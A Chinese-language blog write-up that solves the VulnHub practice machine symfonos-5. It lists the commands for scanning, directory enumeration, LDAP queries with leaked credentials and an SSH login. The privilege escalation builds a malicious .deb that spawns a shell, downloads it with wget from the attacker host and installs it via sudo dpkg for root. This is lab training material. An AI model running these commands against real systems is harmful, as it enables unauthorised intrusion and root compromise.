symfonos-5

VulnHub
安全
发布日期:   2020-02-03
文章字数:   187
阅读时长:   1 分
阅读次数:  

环境

虚拟机平台:VMware Workstation Pro

攻击机:Kali(IP:192.168.253.136)

靶机:symfonos-5(IP:192.168.253.141)

下载:https://www.vulnhub.com/entry/symfonos-5,415/

Let’s go

nmap -A 192.168.253.141

浏览网页无发现,进行枚举

dirsearch -u http://192.168.253.141 -E

尝试直接访问 home.php 发现主页的源代码

得到 ldap 的用户名和密码,使用nmap进行脚本扫描

nmap -p 389 --script ldap-search --script-args "ldap.password='qMDdyZh3cT6eeAWD',ldap.username='cn=admin,dc=symfonos,dc=local'" 192.168.253.141

ssh zeus@192.168.253.141
password:cetkKf4wCuHC9FET

sudo -l

参考这里 https://gtfobins.github.io/gtfobins/dpkg/

TF=$(mktemp -d)
echo 'exec /bin/sh' > $TF/x.sh
fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF

wget http://192.168.253.136/x_1.0_all.deb
sudo dpkg -i x_1.0_all.deb

cd
cat proof.txt

文章作者: DongHuangT1
文章链接: https://DongHuangT1.com/2020/symfonos-5/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 DongHuangT1 !
VulnHub
评论
 上一篇
Craft Craft
平台:HackTheBox
攻击机:Kali(IP:10.10.14.16)
靶机:Craft(IP:10.10.10.110)
2020-02-03 安全
HackTheBox
下一篇 
symfonos-4 symfonos-4
虚拟机平台:Oracle VM VirtualBox
攻击机:Kali(IP:192.168.56.102)
靶机:symfonos-4(IP:192.168.56.106)
2020-02-03 安全
VulnHub
  目录